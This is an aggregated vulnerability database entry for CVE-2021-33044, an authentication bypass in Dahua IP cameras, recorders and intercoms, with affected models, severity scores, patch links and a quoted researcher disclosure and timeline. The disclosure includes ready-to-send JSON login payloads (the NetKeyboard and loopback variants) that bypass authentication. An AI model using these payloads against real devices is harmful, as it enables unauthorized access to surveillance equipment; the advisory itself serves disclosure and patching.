ID

VAR-202109-1875


CVE

CVE-2021-33044


TITLE

Authentication vulnerabilities in multiple Dahua products

Trust: 0.8

sources: JVNDB: JVNDB-2021-012422

DESCRIPTION

An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. Multiple Dahua products contain an authentication vulnerability. As a result, information may be obtained or tampered with, and the service may be put into a denial-of-service (DoS) state. Multiple products offered by Dahua Technology contain a CWE-287 vulnerability. The impact of this vulnerability information on DHI-ASI7213Y-V3-T1 was reported to IPA under the Information Security Early Warning Partnership, and JPCERT/CC coordinated with the developer. Reporter: Mitsui Bussan Secure Direction Co., Ltd. A remote third party may bypass ID authentication by sending a specially crafted data packet to the product. Dahua IPC is a series of industrial computers from China's Dahua company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider.

Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (2021)
Limited Disclosure: September 6, 2021
Full Disclosure: October 6, 2021
PoC: https://github.com/mcw0/DahuaConsole

-=[Dahua]=-
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

-=[Timeline]=-
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)
June 17, 2021: Sent reminder to Dahua PSIRT
June 18, 2021: Asked IPVM for help to get in contact with Dahua
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details
June 19, 2021: Additional details including PoC sent
June 21, 2021: ACK received, vulnerabilities confirmed
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"
July 04, 2021: Confirmed "coordinated disclosure", once again
July 05, 2021: Dahua PSIRT tried to convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021,
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note
August 30, 2021: Sent my "Limited Disclosure" note
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices
September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware
September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches
September 6, 2021: Limited Disclosure
October 6, 2021: Full Disclosure

-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability: "clientType": "NetKeyboard",
Vulnerable device types: IPC/VTH/VTO (tested)
Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021)
Protocol: DHIP and HTTP/HTTPS
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

Successful bypass returns:
    {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}

[Example]
    {
        "method": "global.login",
        "params": {
            "userName": "admin",
            "loginType": "Direct",
            "clientType": "NetKeyboard",
            "authorityType": "Default",
            "passwordType": "Default",
            "password": "Not Used"
        },
        "id": 1,
        "session": 0
    }

-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)
Vulnerable Firmware: Firmware version older than beginning/mid 2020.
Protocol: DHIP
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

Successful bypass returns:
    {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}

[Example]
Random MD5 with l/p: admin/admin
    {
        "method": "global.login",
        "params": {
            "userName": "admin",
            "ipAddr": "127.0.0.1",
            "loginType": "Loopback",
            "clientType": "Local",
            "authorityType": "Default",
            "passwordType": "Default",
            "password": "[REDACTED]"
        },
        "id": 1,
        "session": 0
    }

Plain text with l/p: admin/admin
    {
        "method": "global.login",
        "params": {
            "userName": "admin",
            "ipAddr": "127.0.0.1",
            "loginType": "Loopback",
            "clientType": "Local",
            "authorityType": "Default",
            "passwordType": "Plain",
            "password": "admin"
        },
        "id": 1,
        "session": 0
    }

Trust: 3.51

sources: NVD: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // PACKETSTORM: 164423

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 0.6

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816

AFFECTED PRODUCTS

vendor:dahuamodel:ipc-hx5xxxscope: - version: -

Trust: 1.6

vendor:dahuamodel:ipc-hx3xxxscope: - version: -

Trust: 1.6

vendor:dahuamodel:ipc-hum7xxxscope: - version: -

Trust: 1.6

vendor:dahuasecuritymodel:ipc-hx5xxxscope:ltversion:2.820.0000000.18.r.210705

Trust: 1.0

vendor:dahuasecuritymodel:tpc-sd2221scope:lteversion:2.630.0000000.7.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:vto-75x95xscope:ltversion:4.300.0000003.0.r.210714

Trust: 1.0

vendor:dahuasecuritymodel:tpc-pt8x21bscope:ltversion:2.630.0000000.10.r.210701

Trust: 1.0

vendor:dahuasecuritymodel:sd52cscope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf5x01scope:ltversion:2.630.0000000.12.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hum7xxxscope:ltversion:2.820.0000000.5.r.210705

Trust: 1.0

vendor:dahuasecuritymodel:sd41scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:vth-542xhscope:ltversion:4.500.0000002.0.r.210715

Trust: 1.0

vendor:dahuasecuritymodel:tpc-sd8x21scope:ltversion:2.630.0000000.9.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:sd22scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:sd6alscope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:ipc-hx3xxxscope:ltversion:2.800.0000000.29.r.210630

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf2221scope:ltversion:2.630.0000000.10.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:sd50scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf5x21scope:ltversion:2.630.0000000.8.r.210630

Trust: 1.0

vendor:dahuasecuritymodel:tpc-bf1241scope:ltversion:2.630.0000000.6.r.210707

Trust: 1.0

vendor:dahuasecuritymodel:sd1a1scope:ltversion:2.812.0000007.0.r.210706

Trust: 1.0

vendor:dahuasecuritymodel:vto-65xxxscope:ltversion:4.300.0000004.0.r.210715

Trust: 1.0

vendor:dahuamodel:sd22scope: - version: -

Trust: 0.8

vendor:dahuamodel:tpc-bf1241scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd6alscope: - version: -

Trust: 0.8

vendor:dahuamodel:sd41scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd50scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd1a1scope: - version: -

Trust: 0.8

vendor:dahuamodel:sd52cscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd1a1scope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx5 xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-sd2221scope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-bf5xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd52cscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx1xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd6alscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd50scope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx8xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-bf1241scope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-sd8x21scope: - version: -

Trust: 0.8

vendor:dahuamodel:ipc-hx2xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd49scope: - version: -

Trust: 0.8

vendor:dahuamodel:dhi-asi7213y-v3-t1scope: - version: -

Trust: 0.8

vendor:dahuamodel:vth542xhscope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-pt8x21bscope: - version: -

Trust: 0.8

vendor:dahuamodel:vto75x95xscope:eqversion:versions with a build time older than June 2021

Trust: 0.8

vendor:dahuamodel:ptz dome camera sd22scope: - version: -

Trust: 0.8

vendor:dahuamodel:thermal tpc-bf2221scope: - version: -

Trust: 0.8

vendor:dahuamodel:vto65xxxscope: - version: -

Trust: 0.8

vendor:dahuamodel:ipcscope: - version: -

Trust: 0.6

vendor:dahuamodel:ipc-hx3xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:hx5xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:hum7xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:vto75x95x versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:vto65xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:vth542xh versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:ptz dome camera sd1a1 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd22 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd49 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd50 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd52c versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:sd6al versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:thermal tpc-bf1241 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-bf2221 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-sd2221 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-bf5xxx versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-sd8x21 versions which build time before junescope:eqversion:2021

Trust: 0.6

vendor:dahuamodel:tpc-pt8x21b versions which build time before junescope:eqversion:2021

Trust: 0.6

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // NVD: CVE-2021-33044

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-33044
value: CRITICAL

Trust: 1.0

NVD: CVE-2021-33044
value: CRITICAL

Trust: 0.8

IPA: JVNDB-2024-000007
value: HIGH

Trust: 0.8

CNVD: CNVD-2021-103421
value: HIGH

Trust: 0.6

CNVD: CNVD-2021-70816
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202109-1080
value: CRITICAL

Trust: 0.6

nvd@nist.gov: CVE-2021-33044
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

IPA: JVNDB-2024-000007
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2021-103421
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2021-70816
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 4.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2021-33044
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2021-33044
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

IPA: JVNDB-2024-000007
baseSeverity: HIGH
baseScore: 8.1
vectorString: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: HIGH
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // CNNVD: CNNVD-202109-1080 // NVD: CVE-2021-33044

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.0

problemtype:Improper authentication (CWE-287) [NVD evaluation]

Trust: 0.8

problemtype:Improper authentication (CWE-287) [IPA evaluation]

Trust: 0.8

sources: JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // NVD: CVE-2021-33044

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202109-1080

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-202109-1080

PATCH

title:Dahua Technology : DHCC-SA-202106-001url:https://www.dahuasecurity.com/support/cybersecurity/details/957

Trust: 0.8

title:DHCC-SA-202106-001url:https://www.dahuasecurity.com/aboutUs/trustedCenter/details/582

Trust: 0.8

title:Patch for Dahua IPC authentication bypass vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/311536

Trust: 0.6

title:Patch for Identity authentication bypass vulnerabilities in some Dahua productsurl:https://www.cnvd.org.cn/patchInfo/show/290751

Trust: 0.6

title:Dahua IPC Remediation measures for authorization problem vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=164675

Trust: 0.6

title:PoCurl:https://github.com/mcw0/PoC

Trust: 0.1

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // VULMON: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // CNNVD: CNNVD-202109-1080

EXTERNAL IDS

db:NVDid:CVE-2021-33044

Trust: 6.2

db:PACKETSTORMid:164423

Trust: 1.7

db:JVNDBid:JVNDB-2021-012422

Trust: 0.8

db:JVNid:JVN83655695

Trust: 0.8

db:JVNDBid:JVNDB-2024-000007

Trust: 0.8

db:CNVDid:CNVD-2021-103421

Trust: 0.6

db:CNVDid:CNVD-2021-70816

Trust: 0.6

db:CNNVDid:CNNVD-202109-1080

Trust: 0.6

db:VULMONid:CVE-2021-33044

Trust: 0.1

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // VULMON: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // PACKETSTORM: 164423 // CNNVD: CNNVD-202109-1080 // NVD: CVE-2021-33044

REFERENCES

url:http://seclists.org/fulldisclosure/2021/oct/13

Trust: 2.4

url:https://nvd.nist.gov/vuln/detail/cve-2021-33044

Trust: 2.3

url:https://www.dahuasecurity.com/support/cybersecurity/details/957

Trust: 2.3

url:http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html

Trust: 2.2

url:https://jvn.jp/jp/jvn83655695/index.html

Trust: 0.8

url:https://github.com/mcw0/poc

Trust: 0.1

url:https://github.com/mcw0/dahuaconsole

Trust: 0.1

url:https://www.dahuasecurity.com/support/downloadcenter/firmware

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33045

Trust: 0.1

sources: CNVD: CNVD-2021-103421 // CNVD: CNVD-2021-70816 // VULMON: CVE-2021-33044 // JVNDB: JVNDB-2021-012422 // JVNDB: JVNDB-2024-000007 // PACKETSTORM: 164423 // CNNVD: CNNVD-202109-1080 // NVD: CVE-2021-33044

CREDITS

bashis

Trust: 0.1

sources: PACKETSTORM: 164423

SOURCES

db:CNVDid:CNVD-2021-103421
db:CNVDid:CNVD-2021-70816
db:VULMONid:CVE-2021-33044
db:JVNDBid:JVNDB-2021-012422
db:JVNDBid:JVNDB-2024-000007
db:PACKETSTORMid:164423
db:CNNVDid:CNNVD-202109-1080
db:NVDid:CVE-2021-33044

LAST UPDATE DATE

2024-08-22T23:09:33.552000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2021-103421date:2022-01-18T00:00:00
db:CNVDid:CNVD-2021-70816date:2021-09-14T00:00:00
db:JVNDBid:JVNDB-2021-012422date:2022-08-31T04:47:00
db:JVNDBid:JVNDB-2024-000007date:2024-07-11T07:07:00
db:CNNVDid:CNNVD-202109-1080date:2021-10-08T00:00:00
db:NVDid:CVE-2021-33044date:2024-08-22T01:00:01.277

SOURCES RELEASE DATE

db:CNVDid:CNVD-2021-103421date:2021-12-30T00:00:00
db:CNVDid:CNVD-2021-70816date:2021-09-14T00:00:00
db:JVNDBid:JVNDB-2021-012422date:2022-08-31T00:00:00
db:JVNDBid:JVNDB-2024-000007date:2024-01-18T00:00:00
db:PACKETSTORMid:164423date:2021-10-06T15:11:51
db:CNNVDid:CNNVD-202109-1080date:2021-09-15T00:00:00
db:NVDid:CVE-2021-33044date:2021-09-15T22:15:10.497